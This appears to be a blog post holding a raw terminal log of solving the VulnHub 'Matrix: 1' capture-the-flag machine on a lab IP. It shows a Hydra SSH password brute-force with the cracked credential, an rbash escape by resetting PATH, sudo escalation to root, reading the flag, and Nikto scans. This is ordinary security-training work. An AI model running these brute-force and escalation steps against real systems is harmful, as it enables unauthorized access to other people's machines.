Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-24 00:09:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://172.16.70.139:22/

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# hydra -l guest -P dict.txt 172.16.70.139 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-24 00:09:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://172.16.70.139:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 84 to do in 00:01h, 16 active
[22][ssh] host: 172.16.70.139   login: guest   password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-24 00:10:18
                                                                                                                             
┌──(root💀kwkl)-[/home/kwkl/下载]
└─#   

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# ssh guest@172.16.70.139                                                                                            255 ⨯
The authenticity of host '172.16.70.139 (172.16.70.139)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.70.139' (ECDSA) to the list of known hosts.
guest@172.16.70.139's password: 
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$ 
guest@porteus:~$ 
guest@porteus:~$ 




/home/guest/Desktop /home/guest/Documents /home/guest/Downloads /home/guest/Music /home/guest/Pictures /home/guest/Public /home/guest/Videos /home/guest/prog
guest@porteus:~$ echo /home/guest/prog/*
/home/guest/prog/vi
guest@porteus:~$ echo $SHELL
/bin/rbash
guest@porteus:~$ export PATH=/usr/bin:/bin/
guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password: 
root@porteus:/home/guest# cat flag.txt
cat: flag.txt: No such file or directory
root@porteus:/home/guest# ls
Desktop/  Documents/  Downloads/  Music/  Pictures/  Public/  Videos/  prog/
root@porteus:/home/guest# cd
root@porteus:~# ls
Desktop/  Documents/  Downloads/  Music/  Pictures/  Public/  Videos/  flag.txt
root@porteus:~# cat flag.txt
   _,-.                                                             
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF                 
|`-._`-.\,-'_|  _,-'.                                               
     `-.|.-' | |`.-'|_     WHAT                                     
        |      |_|,-'_`.                                            
              |-._,-'  |     NO, ME NEITHER                         
         jrei | |    _,'                                            
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION    

root@porteus:~#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eDbYGi95-1637854773638)(/Users/aron/Library/Application Support/typora-user-images/image-20211124002018559.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ppmAVUeb-1637854773639)(/Users/aron/Library/Application Support/typora-user-images/image-20211124002030371.png)]

guest@porteus:~$ export PATH=/usr/bin:/bin/
guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$ sudo su
root@porteus:/home/guest# cd
root@porteus:~# ls
Desktop/  Documents/  Downloads/  Music/  Pictures/  Public/  Videos/  flag.txt
root@porteus:~# 

─# ./nikto.pl -host 172.16.70.139                                                                                                                   1 ⨯
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.70.139
+ Target Hostname:    172.16.70.139
+ Target Port:        80
+ Start Time:         2021-11-24 00:35:00 (GMT8)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Python/2.7.14 appears to be outdated (current is at least 3.8.0)
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ ERROR: Error limit (20) reached for host, giving up. Last error: invalid HTTP response
+ SCAN TERMINATED:  16 error(s) and 4 item(s) reported on remote host
+ End Time:           2021-11-24 00:35:12 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                                         
┌──(root💀kwkl)-[/opt/nikto-master/program]
└─# ./nikto.pl -host 172.16.70.139 -C all                                                                                                            1 ⨯
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.70.139
+ Target Hostname:    172.16.70.139
+ Target Port:        80
+ Start Time:         2021-11-24 00:35:37 (GMT8)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ Python/2.7.14 appears to be outdated (current is at least 3.8.0)
+ ERROR: Error limit (20) reached for host, giving up. Last error: invalid HTTP response
+ SCAN TERMINATED:  20 error(s) and 4 item(s) reported on remote host
+ End Time:           2021-11-24 00:35:45 (GMT8) (8 seconds)
------------------------------------------------------------------------

32进制

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
MATRIX: 1 ctf challenge

MATRIX: 1About ReleaseBack to the TopName: Matrix: 1Date release: 19 Aug 2018Author: Ajay VermaSeries: MatrixDownloadBack to the TopPlease remember that VulnHub is a free community resource so we are unable to check the machines that are pr
复制链接

扫一扫